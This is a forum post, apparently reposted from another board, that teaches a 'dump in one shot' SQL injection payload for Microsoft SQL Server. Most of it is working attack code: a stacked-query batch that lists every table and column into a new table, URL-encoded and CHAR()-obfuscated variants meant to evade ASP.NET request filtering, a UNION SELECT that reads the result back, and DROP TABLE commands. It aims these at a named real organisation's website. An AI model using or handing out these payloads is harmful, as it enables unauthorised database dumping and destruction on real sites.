Retrieving all tables and their columns at once MSSQL

[Nytro]

In the Name of ALLAH the Most Beneficent and the Merciful

Zenodermus, Ch3rn0by1 and Me was workinn on MSSQL..

when Zenodermus thought to make a DIOS for MSSQL..

previously at

???:

The SQL Injection Knowledge Base

DIOS is under the heading Retrieving Multiple Tables and Columns

???:

AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;

but thats output is like

table1:column1

table1:column2

table1:column3

table2:column1

table2:column2

table2:column3

table3:column1

and so on..

but after adding some cosmetics to this query.. by Zenodermus.. it became Cool like this u can see in this pic..

but due to Character limit in available dataype VARCHAR(8000) we cannot see the complete output(mean all tables and columns).. jux because each time table is written with each column..

so we decided to make it more cool and tried to display all data..

mean complete tables and columns list..

and later after surfing on MSDN, Google and MSSQL documentation we came to know..

that actual length of varchar(MAX) or varchar(8000) is not 8000 it is 4000 even when u declare it MAX or 8000

and than it became our obsession to make it.. and now our final query output is.. like this..

well before Going into this you must know about Stacked Queries..

i will recommend to read the complete article at

Stacked Queries - SQL Injection Attacks

and in simple words..

With Stacked Queries we can Execute multiple statements in the same query to extend the possibilities of SQL injections

eg..

SELECT * FROM products WHERE productid=1; drop table admin

realistic example..

Salesforce1*Platform: Trusted Application Development Platform - Salesforce.com Drop table admin-- -

and STACKED QUERY SUPPORT.

???:

MySQL/PHP - Not supported (supported by MySQL for other API).

SQL Server/Any API - Supported.

Oracle/Any API - Not supported.

Our Final Query is..

BEGIN

DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100)

DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL)

SET @counter = 1

SET @data = 'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME()

SET @tblName = ''

SET @colNames = ''

WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)

BEGIN

SET @colNames = ''

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl)

SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName

INSERT @TMPTbl VALUES(@tblName)

SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames

SET @counter = @counter + 1

END

SELECT @data AS output INTO Challenge

END

Well This Query looks horible but it actually is not..

Lets go deep into this Query...

with BEGIN and END we declare a Batch/Group of statements to b executed togather..

next step is declaring supporting variables for holding table_name, column_name, a counter, one variable that can hold all table_names and column_names and one table with one column which will be acting as a collection which will be used to hold all the tables names.. will explain its use later

next step is initializing declared variables.. we cannot use these un-initialized variables in SELECT statement..

thats why these are initialized with empty strings.. and @data with database version and database for further display in output..

next step is WHILE Loop

this statement

WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES)

will bound this loop to run through all tables..

at next step @colNames is re initialized with empty string everytime to hold the coloums of Only One table at a time..

next step is getting a table_name into @tblName and getting column_name for that table into @colNames and adding values of both @tblName and @colNames into @data

Now explaining this part

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl)

with this Query

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME

only one table will be fetched..

To get next table in next iteration we used NOT IN Clause..

but NOT IN Clause need a collection for which we declared a TABLE @TMPTbl with a COLUMN named name

for first time @TMPTbl will b empty so first table_name will b retrieved in @tblName

and here in this part..

INSERT @TMPTbl VALUES(@tblName)

each time @tblName value will b inserted in @TMPTbl

and when it will goto this line again

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl)

next table will b retrieved from this statement and so on... as @TMPTbl have first table_name now.. and so on..

when the loop will end.. all tables and columns will be added in @data..

and than with this statement

SELECT @data AS output INTO Challenge

we can store all @data into new table Challenge

to use it in the query

http://site.com/page.aspx?id=1;BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data = +'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames SET @counter = @counter + 1 END SELECT @data AS output INTO Challenge END-- -

now change + with %2b becuase + is taken as space when sent from URL

for the Challenge site our final query will be like

http://www.uwdmaindia.org/EventDetails.aspx?ID=3';BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data=' injected by rummykhan :: '%2b@@version%2b'<br/>'%2bdb_name() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames %2b' : '%2bcolumn_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data=@data%2b'<br/><br/>Table : '%2b@tblName%2b'<br/>Columns : '%2b@colNames%2b'<br/>' SET @counter = @counter %2b 1 END SELECT @data AS output INTO Challenge END-- -

and now the final part of the Challenge.. and STEP 2

how to see the output on web page..

http://site.com/page.aspx?id=-1 union select 1,2,3,output,5 from Challenge-- -

and in Challenge Case..

http://www.uwdmaindia.org/EventDetails.aspx?ID=0' union all select 1,2,3,4,5,output,7,8 from Challenge-- -

running first query multiple time will result in error that an object of Challenge already exist..

so dont forget to drop that table after running the query first time..

http://www.uwdmaindia.org/EventDetails.aspx?ID=0'; DROP TABLE Challenge-- -

and in some cases where System.Web.HttpException is enabled there.. it take HTML tags as dangerous requests

so i changed these to MSSQL CHAR() .. and Now this will work fine in almost every scenario.. and variable names are also shortened reason is same System.Web.HttpException of ASP.Net cannot parse long query..

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @mytbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by rummykhan :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @mytbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @mytbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Chall1 END-- -

author of this DIOS : Zenodermus & rummykhan

thanx a lot for reading this lengthy tutorials.. but i think this deserve ur time.. because it is entirely a new thing in MSSQL.. there was no DIOS existing of this much completeness..

Happy Injecting

Greetz :

Ch3rn0by1 : Lafangoo : Connecting : exploiter-z : PMH~Str!k3r : Gujjar(PCP) : MakMan : madcodE : Ajkaro : Blackhawk : benzi : t.Pro : h4x0r : Sho0Ter

Sursa: https://rdot.org/forum/showthread.php?t=3251

Edited April 3, 2015 by Nytro

[Guest Kronzy]

Foarte bune la chall-uri pentru cei care nu stiu sintaxele de DIOS.

[Nytro]

Mda, se vede nasol postul, mergeti la link-ul original:

https://rdot.org/forum/showthread.php?t=3251